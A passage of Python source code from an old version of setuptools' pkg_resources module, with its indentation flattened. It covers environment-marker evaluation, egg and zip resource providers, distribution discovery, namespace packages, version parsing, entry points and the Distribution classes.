raise SyntaxError(repr(cop)+" operator not allowed in environment markers")
return cop(cls.evaluate(nodelist[1]), cls.evaluate(nodelist[3]))
@classmethod
def get_op(cls, op):
ops = {
symbol.test: cls.test,
symbol.and_test: cls.and_test,
symbol.atom: cls.atom,
symbol.comparison: cls.comparison,
'not in': lambda x, y: x not in y,
'in': lambda x, y: x in y,
'==': operator.eq,
'!=': operator.ne,
}
if hasattr(symbol, 'or_test'):
ops[symbol.or_test] = cls.test
return ops[op]
@classmethod
def evaluate_marker(cls, text, extra=None):
"""
Evaluate a PEP 426 environment marker on CPython 2.4+.
Return a boolean indicating the marker result in this environment.
Raise SyntaxError if marker is invalid.
This implementation uses the 'parser' module, which is not implemented on
Jython and has been superseded by the 'ast' module in Python 2.6 and
later.
"""
return cls.interpret(parser.expr(text).totuple(1)[1])
@classmethod
def _markerlib_evaluate(cls, text):
"""
Evaluate a PEP 426 environment marker using markerlib.
Return a boolean indicating the marker result in this environment.
Raise SyntaxError if marker is invalid.
"""
import _markerlib
# markerlib implements Metadata 1.2 (PEP 345) environment markers.
# Translate the variables to Metadata 2.0 (PEP 426).
env = _markerlib.default_environment()
for key in env.keys():
new_key = key.replace('.', '_')
env[new_key] = env.pop(key)
try:
result = _markerlib.interpret(text, env)
except NameError:
e = sys.exc_info()[1]
raise SyntaxError(e.args[0])
return result
if 'parser' not in globals():
# Fall back to less-complete _markerlib implementation if 'parser' module
# is not available.
evaluate_marker = _markerlib_evaluate
@classmethod
def interpret(cls, nodelist):
while len(nodelist)==2: nodelist = nodelist[1]
try:
op = cls.get_op(nodelist[0])
except KeyError:
raise SyntaxError("Comparison or logical expression expected")
return op(nodelist)
@classmethod
def evaluate(cls, nodelist):
while len(nodelist)==2: nodelist = nodelist[1]
kind = nodelist[0]
name = nodelist[1]
if kind==token.NAME:
try:
op = cls.values[name]
except KeyError:
raise SyntaxError("Unknown name %r" % name)
return op()
if kind==token.STRING:
s = nodelist[1]
if s[:1] not in "'\"" or s.startswith('"""') or s.startswith("'''") \
or '\\' in s:
raise SyntaxError(
"Only plain strings allowed in environment markers")
return s[1:-1]
raise SyntaxError("Language feature not supported in environment markers")
invalid_marker = MarkerEvaluation.is_invalid_marker
evaluate_marker = MarkerEvaluation.evaluate_marker
class NullProvider:
"""Try to implement resources and metadata for arbitrary PEP 302 loaders"""
egg_name = None
egg_info = None
loader = None
def __init__(self, module):
self.loader = getattr(module, '__loader__', None)
self.module_path = os.path.dirname(getattr(module, '__file__', ''))
def get_resource_filename(self, manager, resource_name):
return self._fn(self.module_path, resource_name)
def get_resource_stream(self, manager, resource_name):
return BytesIO(self.get_resource_string(manager, resource_name))
def get_resource_string(self, manager, resource_name):
return self._get(self._fn(self.module_path, resource_name))
def has_resource(self, resource_name):
return self._has(self._fn(self.module_path, resource_name))
def has_metadata(self, name):
return self.egg_info and self._has(self._fn(self.egg_info,name))
if sys.version_info <= (3,):
def get_metadata(self, name):
if not self.egg_info:
return ""
return self._get(self._fn(self.egg_info,name))
else:
def get_metadata(self, name):
if not self.egg_info:
return ""
return self._get(self._fn(self.egg_info,name)).decode("utf-8")
def get_metadata_lines(self, name):
return yield_lines(self.get_metadata(name))
def resource_isdir(self,resource_name):
return self._isdir(self._fn(self.module_path, resource_name))
def metadata_isdir(self,name):
return self.egg_info and self._isdir(self._fn(self.egg_info,name))
def resource_listdir(self,resource_name):
return self._listdir(self._fn(self.module_path,resource_name))
def metadata_listdir(self,name):
if self.egg_info:
return self._listdir(self._fn(self.egg_info,name))
return []
def run_script(self,script_name,namespace):
script = 'scripts/'+script_name
if not self.has_metadata(script):
raise ResolutionError("No script named %r" % script_name)
script_text = self.get_metadata(script).replace('\r\n','\n')
script_text = script_text.replace('\r','\n')
script_filename = self._fn(self.egg_info,script)
namespace['__file__'] = script_filename
if os.path.exists(script_filename):
execfile(script_filename, namespace, namespace)
else:
from linecache import cache
cache[script_filename] = (
len(script_text), 0, script_text.split('\n'), script_filename
)
script_code = compile(script_text,script_filename,'exec')
exec(script_code, namespace, namespace)
def _has(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _isdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _listdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _fn(self, base, resource_name):
if resource_name:
return os.path.join(base, *resource_name.split('/'))
return base
def _get(self, path):
if hasattr(self.loader, 'get_data'):
return self.loader.get_data(path)
raise NotImplementedError(
"Can't perform this operation for loaders without 'get_data()'"
)
register_loader_type(object, NullProvider)
class EggProvider(NullProvider):
"""Provider based on a virtual filesystem"""
def __init__(self,module):
NullProvider.__init__(self,module)
self._setup_prefix()
def _setup_prefix(self):
# we assume here that our metadata may be nested inside a "basket"
# of multiple eggs; that's why we use module_path instead of .archive
path = self.module_path
old = None
while path!=old:
if path.lower().endswith('.egg'):
self.egg_name = os.path.basename(path)
self.egg_info = os.path.join(path, 'EGG-INFO')
self.egg_root = path
break
old = path
path, base = os.path.split(path)
class DefaultProvider(EggProvider):
"""Provides access to package resources in the filesystem"""
def _has(self, path):
return os.path.exists(path)
def _isdir(self,path):
return os.path.isdir(path)
def _listdir(self,path):
return os.listdir(path)
def get_resource_stream(self, manager, resource_name):
return open(self._fn(self.module_path, resource_name), 'rb')
def _get(self, path):
stream = open(path, 'rb')
try:
return stream.read()
finally:
stream.close()
register_loader_type(type(None), DefaultProvider)
if importlib_bootstrap is not None:
register_loader_type(importlib_bootstrap.SourceFileLoader, DefaultProvider)
class EmptyProvider(NullProvider):
"""Provider that returns nothing for all requests"""
_isdir = _has = lambda self,path: False
_get = lambda self,path: ''
_listdir = lambda self,path: []
module_path = None
def __init__(self):
pass
empty_provider = EmptyProvider()
def build_zipmanifest(path):
"""
This builds a similar dictionary to the zipimport directory
caches. However instead of tuples, ZipInfo objects are stored.
The translation of the tuple is as follows:
* [0] - zipinfo.filename on stock pythons this needs "/" --> os.sep
on pypy it is the same (one reason why distribute did work
in some cases on pypy and win32).
* [1] - zipinfo.compress_type
* [2] - zipinfo.compress_size
* [3] - zipinfo.file_size
* [4] - len(utf-8 encoding of filename) if zipinfo & 0x800
len(ascii encoding of filename) otherwise
* [5] - (zipinfo.date_time[0] - 1980) << 9 |
zipinfo.date_time[1] << 5 | zipinfo.date_time[2]
* [6] - (zipinfo.date_time[3] - 1980) << 11 |
zipinfo.date_time[4] << 5 | (zipinfo.date_time[5] // 2)
* [7] - zipinfo.CRC
"""
zipinfo = dict()
zfile = zipfile.ZipFile(path)
#Got ZipFile has not __exit__ on python 3.1
try:
for zitem in zfile.namelist():
zpath = zitem.replace('/', os.sep)
zipinfo[zpath] = zfile.getinfo(zitem)
assert zipinfo[zpath] is not None
finally:
zfile.close()
return zipinfo
class ZipProvider(EggProvider):
"""Resource support for zips and eggs"""
eagers = None
def __init__(self, module):
EggProvider.__init__(self,module)
self.zipinfo = build_zipmanifest(self.loader.archive)
self.zip_pre = self.loader.archive+os.sep
def _zipinfo_name(self, fspath):
# Convert a virtual filename (full path to file) into a zipfile subpath
# usable with the zipimport directory cache for our target archive
if fspath.startswith(self.zip_pre):
return fspath[len(self.zip_pre):]
raise AssertionError(
"%s is not a subpath of %s" % (fspath,self.zip_pre)
)
def _parts(self,zip_path):
# Convert a zipfile subpath into an egg-relative path part list
fspath = self.zip_pre+zip_path # pseudo-fs path
if fspath.startswith(self.egg_root+os.sep):
return fspath[len(self.egg_root)+1:].split(os.sep)
raise AssertionError(
"%s is not a subpath of %s" % (fspath,self.egg_root)
)
def get_resource_filename(self, manager, resource_name):
if not self.egg_name:
raise NotImplementedError(
"resource_filename() only supported for .egg, not .zip"
)
# no need to lock for extraction, since we use temp names
zip_path = self._resource_to_zip(resource_name)
eagers = self._get_eager_resources()
if '/'.join(self._parts(zip_path)) in eagers:
for name in eagers:
self._extract_resource(manager, self._eager_to_zip(name))
return self._extract_resource(manager, zip_path)
@staticmethod
def _get_date_and_size(zip_stat):
size = zip_stat.file_size
date_time = zip_stat.date_time + (0, 0, -1) # ymdhms+wday, yday, dst
#1980 offset already done
timestamp = time.mktime(date_time)
return timestamp, size
def _extract_resource(self, manager, zip_path):
if zip_path in self._index():
for name in self._index()[zip_path]:
last = self._extract_resource(
manager, os.path.join(zip_path, name)
)
return os.path.dirname(last) # return the extracted directory name
timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
if not WRITE_SUPPORT:
raise IOError('"os.rename" and "os.unlink" are not supported '
'on this platform')
try:
real_path = manager.get_cache_path(
self.egg_name, self._parts(zip_path)
)
if self._is_current(real_path, zip_path):
return real_path
outf, tmpnam = _mkstemp(".$extract", dir=os.path.dirname(real_path))
os.write(outf, self.loader.get_data(zip_path))
os.close(outf)
utime(tmpnam, (timestamp,timestamp))
manager.postprocess(tmpnam, real_path)
try:
rename(tmpnam, real_path)
except os.error:
if os.path.isfile(real_path):
if self._is_current(real_path, zip_path):
# the file became current since it was checked above,
# so proceed.
return real_path
elif os.name=='nt': # Windows, del old file and retry
unlink(real_path)
rename(tmpnam, real_path)
return real_path
raise
except os.error:
manager.extraction_error() # report a user-friendly error
return real_path
def _is_current(self, file_path, zip_path):
"""
Return True if the file_path is current for this zip_path
"""
timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
if not os.path.isfile(file_path):
return False
stat = os.stat(file_path)
if stat.st_size!=size or stat.st_mtime!=timestamp:
return False
# check that the contents match
zip_contents = self.loader.get_data(zip_path)
f = open(file_path, 'rb')
file_contents = f.read()
f.close()
return zip_contents == file_contents
def _get_eager_resources(self):
if self.eagers is None:
eagers = []
for name in ('native_libs.txt', 'eager_resources.txt'):
if self.has_metadata(name):
eagers.extend(self.get_metadata_lines(name))
self.eagers = eagers
return self.eagers
def _index(self):
try:
return self._dirindex
except AttributeError:
ind = {}
for path in self.zipinfo:
parts = path.split(os.sep)
while parts:
parent = os.sep.join(parts[:-1])
if parent in ind:
ind[parent].append(parts[-1])
break
else:
ind[parent] = [parts.pop()]
self._dirindex = ind
return ind
def _has(self, fspath):
zip_path = self._zipinfo_name(fspath)
return zip_path in self.zipinfo or zip_path in self._index()
def _isdir(self,fspath):
return self._zipinfo_name(fspath) in self._index()
def _listdir(self,fspath):
return list(self._index().get(self._zipinfo_name(fspath), ()))
def _eager_to_zip(self,resource_name):
return self._zipinfo_name(self._fn(self.egg_root,resource_name))
def _resource_to_zip(self,resource_name):
return self._zipinfo_name(self._fn(self.module_path,resource_name))
register_loader_type(zipimport.zipimporter, ZipProvider)
class FileMetadata(EmptyProvider):
"""Metadata handler for standalone PKG-INFO files
Usage::
metadata = FileMetadata("/path/to/PKG-INFO")
This provider rejects all data and metadata requests except for PKG-INFO,
which is treated as existing, and will be the contents of the file at
the provided location.
"""
def __init__(self,path):
self.path = path
def has_metadata(self,name):
return name=='PKG-INFO'
def get_metadata(self,name):
if name=='PKG-INFO':
f = open(self.path,'rU')
metadata = f.read()
f.close()
return metadata
raise KeyError("No metadata except PKG-INFO is available")
def get_metadata_lines(self,name):
return yield_lines(self.get_metadata(name))
class PathMetadata(DefaultProvider):
"""Metadata provider for egg directories
Usage::
# Development eggs:
egg_info = "/path/to/PackageName.egg-info"
base_dir = os.path.dirname(egg_info)
metadata = PathMetadata(base_dir, egg_info)
dist_name = os.path.splitext(os.path.basename(egg_info))[0]
dist = Distribution(basedir,project_name=dist_name,metadata=metadata)
# Unpacked egg directories:
egg_path = "/path/to/PackageName-ver-pyver-etc.egg"
metadata = PathMetadata(egg_path, os.path.join(egg_path,'EGG-INFO'))
dist = Distribution.from_filename(egg_path, metadata=metadata)
"""
def __init__(self, path, egg_info):
self.module_path = path
self.egg_info = egg_info
class EggMetadata(ZipProvider):
"""Metadata provider for .egg files"""
def __init__(self, importer):
"""Create a metadata provider from a zipimporter"""
self.zipinfo = build_zipmanifest(importer.archive)
self.zip_pre = importer.archive+os.sep
self.loader = importer
if importer.prefix:
self.module_path = os.path.join(importer.archive, importer.prefix)
else:
self.module_path = importer.archive
self._setup_prefix()
_declare_state('dict', _distribution_finders = {})
def register_finder(importer_type, distribution_finder):
"""Register `distribution_finder` to find distributions in sys.path items
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `distribution_finder` is a callable that, passed a path
item and the importer instance, yields ``Distribution`` instances found on
that path item. See ``pkg_resources.find_on_path`` for an example."""
_distribution_finders[importer_type] = distribution_finder
def find_distributions(path_item, only=False):
"""Yield distributions accessible via `path_item`"""
importer = get_importer(path_item)
finder = _find_adapter(_distribution_finders, importer)
return finder(importer, path_item, only)
def find_eggs_in_zip(importer, path_item, only=False):
"""
Find eggs in zip files; possibly multiple nested eggs.
"""
if importer.archive.endswith('.whl'):
# wheels are not supported with this finder
# they don't have PKG-INFO metadata, and won't ever contain eggs
return
metadata = EggMetadata(importer)
if metadata.has_metadata('PKG-INFO'):
yield Distribution.from_filename(path_item, metadata=metadata)
if only:
return # don't yield nested distros
for subitem in metadata.resource_listdir('/'):
if subitem.endswith('.egg'):
subpath = os.path.join(path_item, subitem)
for dist in find_eggs_in_zip(zipimport.zipimporter(subpath), subpath):
yield dist
register_finder(zipimport.zipimporter, find_eggs_in_zip)
def find_nothing(importer, path_item, only=False):
return ()
register_finder(object,find_nothing)
def find_on_path(importer, path_item, only=False):
"""Yield distributions accessible on a sys.path directory"""
path_item = _normalize_cached(path_item)
if os.path.isdir(path_item) and os.access(path_item, os.R_OK):
if path_item.lower().endswith('.egg'):
# unpacked egg
yield Distribution.from_filename(
path_item, metadata=PathMetadata(
path_item, os.path.join(path_item,'EGG-INFO')
)
)
else:
# scan for .egg and .egg-info in directory
for entry in os.listdir(path_item):
lower = entry.lower()
if lower.endswith('.egg-info') or lower.endswith('.dist-info'):
fullpath = os.path.join(path_item, entry)
if os.path.isdir(fullpath):
# egg-info directory, allow getting metadata
metadata = PathMetadata(path_item, fullpath)
else:
metadata = FileMetadata(fullpath)
yield Distribution.from_location(
path_item,entry,metadata,precedence=DEVELOP_DIST
)
elif not only and lower.endswith('.egg'):
for dist in find_distributions(os.path.join(path_item, entry)):
yield dist
elif not only and lower.endswith('.egg-link'):
entry_file = open(os.path.join(path_item, entry))
try:
entry_lines = entry_file.readlines()
finally:
entry_file.close()
for line in entry_lines:
if not line.strip(): continue
for item in find_distributions(os.path.join(path_item,line.rstrip())):
yield item
break
register_finder(pkgutil.ImpImporter,find_on_path)
if importlib_bootstrap is not None:
register_finder(importlib_bootstrap.FileFinder, find_on_path)
_declare_state('dict', _namespace_handlers={})
_declare_state('dict', _namespace_packages={})
def register_namespace_handler(importer_type, namespace_handler):
"""Register `namespace_handler` to declare namespace packages
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `namespace_handler` is a callable like this::
def namespace_handler(importer,path_entry,moduleName,module):
# return a path_entry to use for child packages
Namespace handlers are only called if the importer object has already
agreed that it can handle the relevant path item, and they should only
return a subpath if the module __path__ does not already contain an
equivalent subpath. For an example namespace handler, see
``pkg_resources.file_ns_handler``.
"""
_namespace_handlers[importer_type] = namespace_handler
def _handle_ns(packageName, path_item):
"""Ensure that named package includes a subpath of path_item (if needed)"""
importer = get_importer(path_item)
if importer is None:
return None
loader = importer.find_module(packageName)
if loader is None:
return None
module = sys.modules.get(packageName)
if module is None:
module = sys.modules[packageName] = imp.new_module(packageName)
module.__path__ = []
_set_parent_ns(packageName)
elif not hasattr(module,'__path__'):
raise TypeError("Not a package:", packageName)
handler = _find_adapter(_namespace_handlers, importer)
subpath = handler(importer, path_item, packageName, module)
if subpath is not None:
path = module.__path__
path.append(subpath)
loader.load_module(packageName)
for path_item in path:
if path_item not in module.__path__:
module.__path__.append(path_item)
return subpath
def declare_namespace(packageName):
"""Declare that package 'packageName' is a namespace package"""
imp.acquire_lock()
try:
if packageName in _namespace_packages:
return
path, parent = sys.path, None
if '.' in packageName:
parent = '.'.join(packageName.split('.')[:-1])
declare_namespace(parent)
if parent not in _namespace_packages:
__import__(parent)
try:
path = sys.modules[parent].__path__
except AttributeError:
raise TypeError("Not a package:", parent)
# Track what packages are namespaces, so when new path items are added,
# they can be updated
_namespace_packages.setdefault(parent,[]).append(packageName)
_namespace_packages.setdefault(packageName,[])
for path_item in path:
# Ensure all the parent's path items are reflected in the child,
# if they apply
_handle_ns(packageName, path_item)
finally:
imp.release_lock()
def fixup_namespace_packages(path_item, parent=None):
"""Ensure that previously-declared namespace packages include path_item"""
imp.acquire_lock()
try:
for package in _namespace_packages.get(parent,()):
subpath = _handle_ns(package, path_item)
if subpath: fixup_namespace_packages(subpath,package)
finally:
imp.release_lock()
def file_ns_handler(importer, path_item, packageName, module):
"""Compute an ns-package subpath for a filesystem or zipfile importer"""
subpath = os.path.join(path_item, packageName.split('.')[-1])
normalized = _normalize_cached(subpath)
for item in module.__path__:
if _normalize_cached(item)==normalized:
break
else:
# Only return the path if it's not already there
return subpath
register_namespace_handler(pkgutil.ImpImporter,file_ns_handler)
register_namespace_handler(zipimport.zipimporter,file_ns_handler)
if importlib_bootstrap is not None:
register_namespace_handler(importlib_bootstrap.FileFinder, file_ns_handler)
def null_ns_handler(importer, path_item, packageName, module):
return None
register_namespace_handler(object,null_ns_handler)
def normalize_path(filename):
"""Normalize a file/dir name for comparison purposes"""
return os.path.normcase(os.path.realpath(filename))
def _normalize_cached(filename,_cache={}):
try:
return _cache[filename]
except KeyError:
_cache[filename] = result = normalize_path(filename)
return result
def _set_parent_ns(packageName):
parts = packageName.split('.')
name = parts.pop()
if parts:
parent = '.'.join(parts)
setattr(sys.modules[parent], name, sys.modules[packageName])
def yield_lines(strs):
"""Yield non-empty/non-comment lines of a ``basestring`` or sequence"""
if isinstance(strs,basestring):
for s in strs.splitlines():
s = s.strip()
if s and not s.startswith('#'): # skip blank lines/comments
yield s
else:
for ss in strs:
for s in yield_lines(ss):
yield s
LINE_END = re.compile(r"\s*(#.*)?$").match # whitespace and comment
CONTINUE = re.compile(r"\s*\\\s*(#.*)?$").match # line continuation
DISTRO = re.compile(r"\s*((\w|[-.])+)").match # Distribution or extra
VERSION = re.compile(r"\s*(<=?|>=?|==|!=)\s*((\w|[-.])+)").match # ver. info
COMMA = re.compile(r"\s*,").match # comma between items
OBRACKET = re.compile(r"\s*\[").match
CBRACKET = re.compile(r"\s*\]").match
MODULE = re.compile(r"\w+(\.\w+)*$").match
EGG_NAME = re.compile(
r"(?P<name>[^-]+)"
r"( -(?P<ver>[^-]+) (-py(?P<pyver>[^-]+) (-(?P<plat>.+))? )? )?",
re.VERBOSE | re.IGNORECASE
).match
component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
replace = {'pre':'c', 'preview':'c','-':'final-','rc':'c','dev':'@'}.get
def _parse_version_parts(s):
for part in component_re.split(s):
part = replace(part,part)
if not part or part=='.':
continue
if part[:1] in '0123456789':
yield part.zfill(8) # pad for numeric comparison
else:
yield '*'+part
yield '*final' # ensure that alpha/beta/candidate are before final
def parse_version(s):
"""Convert a version string to a chronologically-sortable key
This is a rough cross between distutils' StrictVersion and LooseVersion;
if you give it versions that would work with StrictVersion, then it behaves
the same; otherwise it acts like a slightly-smarter LooseVersion. It is
*possible* to create pathological version coding schemes that will fool
this parser, but they should be very rare in practice.
The returned value will be a tuple of strings. Numeric portions of the
version are padded to 8 digits so they will compare numerically, but
without relying on how numbers compare relative to strings. Dots are
dropped, but dashes are retained. Trailing zeros between alpha segments
or dashes are suppressed, so that e.g. "2.4.0" is considered the same as
"2.4". Alphanumeric parts are lower-cased.
The algorithm assumes that strings like "-" and any alpha string that
alphabetically follows "final" represents a "patch level". So, "2.4-1"
is assumed to be a branch or patch of "2.4", and therefore "2.4.1" is
considered newer than "2.4-1", which in turn is newer than "2.4".
Strings like "a", "b", "c", "alpha", "beta", "candidate" and so on (that
come before "final" alphabetically) are assumed to be pre-release versions,
so that the version "2.4" is considered newer than "2.4a1".
Finally, to handle miscellaneous cases, the strings "pre", "preview", and
"rc" are treated as if they were "c", i.e. as though they were release
candidates, and therefore are not as new as a version string that does not
contain them, and "dev" is replaced with an '@' so that it sorts lower than
than any other pre-release tag.
"""
parts = []
for part in _parse_version_parts(s.lower()):
if part.startswith('*'):
if part<'*final': # remove '-' before a prerelease tag
while parts and parts[-1]=='*final-': parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1]=='00000000':
parts.pop()
parts.append(part)
return tuple(parts)
class EntryPoint(object):
"""Object representing an advertised importable object"""
def __init__(self, name, module_name, attrs=(), extras=(), dist=None):
if not MODULE(module_name):
raise ValueError("Invalid module name", module_name)
self.name = name
self.module_name = module_name
self.attrs = tuple(attrs)
self.extras = Requirement.parse(("x[%s]" % ','.join(extras))).extras
self.dist = dist
def __str__(self):
s = "%s = %s" % (self.name, self.module_name)
if self.attrs:
s += ':' + '.'.join(self.attrs)
if self.extras:
s += ' [%s]' % ','.join(self.extras)
return s
def __repr__(self):
return "EntryPoint.parse(%r)" % str(self)
def load(self, require=True, env=None, installer=None):
if require: self.require(env, installer)
entry = __import__(self.module_name, globals(),globals(), ['__name__'])
for attr in self.attrs:
try:
entry = getattr(entry,attr)
except AttributeError:
raise ImportError("%r has no %r attribute" % (entry,attr))
return entry
def require(self, env=None, installer=None):
if self.extras and not self.dist:
raise UnknownExtra("Can't require() without a distribution", self)
list(map(working_set.add,
working_set.resolve(self.dist.requires(self.extras),env,installer)))
@classmethod
def parse(cls, src, dist=None):
"""Parse a single entry point from string `src`
Entry point syntax follows the form::
name = some.module:some.attr [extra1,extra2]
The entry name and module name are required, but the ``:attrs`` and
``[extras]`` parts are optional
"""
try:
attrs = extras = ()
name,value = src.split('=',1)
if '[' in value:
value,extras = value.split('[',1)
req = Requirement.parse("x["+extras)
if req.specs: raise ValueError
extras = req.extras
if ':' in value:
value,attrs = value.split(':',1)
if not MODULE(attrs.rstrip()):
raise ValueError
attrs = attrs.rstrip().split('.')
except ValueError:
raise ValueError(
"EntryPoint must be in 'name=module:attrs [extras]' format",
src
)
else:
return cls(name.strip(), value.strip(), attrs, extras, dist)
@classmethod
def parse_group(cls, group, lines, dist=None):
"""Parse an entry point group"""
if not MODULE(group):
raise ValueError("Invalid group name", group)
this = {}
for line in yield_lines(lines):
ep = cls.parse(line, dist)
if ep.name in this:
raise ValueError("Duplicate entry point", group, ep.name)
this[ep.name]=ep
return this
@classmethod
def parse_map(cls, data, dist=None):
"""Parse a map of entry point groups"""
if isinstance(data,dict):
data = data.items()
else:
data = split_sections(data)
maps = {}
for group, lines in data:
if group is None:
if not lines:
continue
raise ValueError("Entry points must be listed in groups")
group = group.strip()
if group in maps:
raise ValueError("Duplicate group name", group)
maps[group] = cls.parse_group(group, lines, dist)
return maps
def _remove_md5_fragment(location):
if not location:
return ''
parsed = urlparse(location)
if parsed[-1].startswith('md5='):
return urlunparse(parsed[:-1] + ('',))
return location
class Distribution(object):
"""Wrap an actual or potential sys.path entry w/metadata"""
PKG_INFO = 'PKG-INFO'
def __init__(self, location=None, metadata=None, project_name=None,
version=None, py_version=PY_MAJOR, platform=None,
precedence=EGG_DIST):
self.project_name = safe_name(project_name or 'Unknown')
if version is not None:
self._version = safe_version(version)
self.py_version = py_version
self.platform = platform
self.location = location
self.precedence = precedence
self._provider = metadata or empty_provider
@classmethod
def from_location(cls,location,basename,metadata=None,**kw):
project_name, version, py_version, platform = [None]*4
basename, ext = os.path.splitext(basename)
if ext.lower() in _distributionImpl:
# .dist-info gets much metadata differently
match = EGG_NAME(basename)
if match:
project_name, version, py_version, platform = match.group(
'name','ver','pyver','plat'
)
cls = _distributionImpl[ext.lower()]
return cls(
location, metadata, project_name=project_name, version=version,
py_version=py_version, platform=platform, **kw
)
hashcmp = property(
lambda self: (
getattr(self,'parsed_version',()),
self.precedence,
self.key,
_remove_md5_fragment(self.location),
self.py_version,
self.platform
)
)
def __hash__(self): return hash(self.hashcmp)
def __lt__(self, other):
return self.hashcmp < other.hashcmp
def __le__(self, other):
return self.hashcmp <= other.hashcmp
def __gt__(self, other):
return self.hashcmp > other.hashcmp
def __ge__(self, other):
return self.hashcmp >= other.hashcmp
def __eq__(self, other):
if not isinstance(other, self.__class__):
# It's not a Distribution, so they are not equal
return False
return self.hashcmp == other.hashcmp
def __ne__(self, other):
return not self == other
# These properties have to be lazy so that we don't have to load any
# metadata until/unless it's actually needed. (i.e., some distributions
# may not know their name or version without loading PKG-INFO)
@property
def key(self):
try:
return self._key
except AttributeError:
self._key = key = self.project_name.lower()
return key
@property
def parsed_version(self):
try:
return self._parsed_version
except AttributeError:
self._parsed_version = pv = parse_version(self.version)
return pv
@property
def version(self):
try:
return self._version
except AttributeError:
for line in self._get_metadata(self.PKG_INFO):
if line.lower().startswith('version:'):
self._version = safe_version(line.split(':',1)[1].strip())
return self._version
else:
raise ValueError(
"Missing 'Version:' header and/or %s file" % self.PKG_INFO, self
)
@property
def _dep_map(self):
try:
return self.__dep_map
except AttributeError:
dm = self.__dep_map = {None: []}
for name in 'requires.txt', 'depends.txt':
for extra,reqs in split_sections(self._get_metadata(name)):
if extra:
if ':' in extra:
extra, marker = extra.split(':',1)
if invalid_marker(marker):
reqs=[] # XXX warn
elif not evaluate_marker(marker):
reqs=[]
extra = safe_extra(extra) or None
dm.setdefault(extra,[]).extend(parse_requirements(reqs))
return dm
def requires(self,extras=()):
"""List of Requirements needed for this distro if `extras` are used"""
dm = self._dep_map
deps = []
deps.extend(dm.get(None,()))
for ext in extras:
try:
deps.extend(dm[safe_extra(ext)])
except KeyError:
raise UnknownExtra(
"%s has no such extra feature %r" % (self, ext)
)
return deps
def _get_metadata(self,name):
if self.has_metadata(name):
for line in self.get_metadata_lines(name):
yield line
def activate(self,path=None):
"""Ensure distribution is importable on `path` (default=sys.path)"""
if path is None: path = sys.path
self.insert_on(path)
if path is sys.path:
fixup_namespace_packages(self.location)
list(map(declare_namespace, self._get_metadata('namespace_packages.txt')))
def egg_name(self):
"""Return what this distribution's standard .egg filename should be"""
filename = "%s-%s-py%s" % (
to_filename(self.project_name), to_filename(self.version),
self.py_version or PY_MAJOR
)
if self.platform:
filename += '-'+self.platform
return filename
def __repr__(self):
if self.location:
return "%s (%s)" % (self,self.location)
else:
return str(self)
def __str__(self):
try: version = getattr(self,'version',None)
except ValueError: version = None
version = version or "[unknown version]"
return "%s %s" % (self.project_name,version)
def __getattr__(self,attr):
"""Delegate all unrecognized public attributes to .metadata provider"""
if attr.startswith('_'):
raise AttributeError(attr)
return getattr(self._provider, attr)
@classmethod
def from_filename(cls,filename,metadata=None, **kw):
return cls.from_location(
_normalize_cached(filename), os.path.basename(filename), metadata,
**kw
)
def as_requirement(self):
"""Return a ``Requirement`` that matches this distribution exactly"""
return Requirement.parse('%s==%s' % (self.project_name, self.version))
def load_entry_point(self, group, name):
"""Return the `name` entry point of `group` or raise ImportError"""
ep = self.get_entry_info(group,name)
if ep is None:
raise ImportError("Entry point %r not found" % ((group,name),))
return ep.load()
def get_entry_map(self, group=None):
"""Return the entry point map for `group`, or the full entry map"""
try:
ep_map = self._ep_map
except AttributeError:
ep_map = self._ep_map = EntryPoint.parse_map(
self._get_metadata('entry_points.txt'), self
)
if group is not None:
return ep_map.get(group,{})
return ep_map
def get_entry_info(self, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return self.get_entry_map(group).get(name)
def insert_on(self, path, loc = None):
"""Insert self.location in path before its nearest parent directory"""
loc = loc or self.location
if not loc:
return
nloc = _normalize_cached(loc)
bdir = os.path.dirname(nloc)
npath= [(p and _normalize_cached(p) or p) for p in path]
for p, item in enumerate(npath):
if item==nloc:
break
elif item==bdir and self.precedence==EGG_DIST:
# if it's an .egg, give it precedence over its directory
if path is sys.path:
self.check_version_conflict()
path.insert(p, loc)
npath.insert(p, nloc)
break
else:
if path is sys.path:
self.check_version_conflict()
path.append(loc)
return
# p is the spot where we found or inserted loc; now remove duplicates
while 1:
try:
np = npath.index(nloc, p+1)
except ValueError:
break
else:
del npath[np], path[np]
p = np # ha!
return
def check_version_conflict(self):
if self.key=='setuptools':
return # ignore the inevitable setuptools self-conflicts :(
nsp = dict.fromkeys(self._get_metadata('namespace_packages.txt'))
loc = normalize_path(self.location)
for modname in self._get_metadata('top_level.txt'):
if (modname not in sys.modules or modname in nsp
or modname in _namespace_packages):
continue
if modname in ('pkg_resources', 'setuptools', 'site'):
continue
fn = getattr(sys.modules[modname], '__file__', None)
if fn and (normalize_path(fn).startswith(loc) or
fn.startswith(self.location)):
continue
issue_warning(
"Module %s was already imported from %s, but %s is being added"
" to sys.path" % (modname, fn, self.location),
)
def has_version(self):
try:
self.version
except ValueError:
issue_warning("Unbuilt egg for "+repr(self))
return False
return True
def clone(self,**kw):
"""Copy this distribution, substituting in any changed keyword args"""
for attr in (
'project_name', 'version', 'py_version', 'platform', 'location',
'precedence'
):
kw.setdefault(attr, getattr(self,attr,None))
kw.setdefault('metadata', self._provider)
return self.__class__(**kw)
@property
def extras(self):
return [dep for dep in self._dep_map if dep]
class DistInfoDistribution(Distribution):
"""Wrap an actual or potential sys.path entry w/metadata, .dist-info style"""
PKG_INFO = 'METADATA'
EQEQ = re.compile(r"([\(,])\s*(\d.*?)\s*([,\)])")
@property
def _parsed_pkg_info(self):
"""Parse and cache metadata"""
try:
return self._pkg_info
except AttributeError:
from email.parser import Parser
self._pkg_info = Parser().parsestr(self.get_metadata(self.PKG_INFO))
return self._pkg_info
@property
def _dep_map(self):
try:
return self.__dep_map
except AttributeError:
self.__dep_map = self._compute_dependencies()
return self.__dep_map
def _preparse_requirement(self, requires_dist):
"""Convert 'Foobar (1); baz' to ('Foobar ==1', 'baz')
Split environment marker, add == prefix to version specifiers as
necessary, and remove parenthesis.
"""
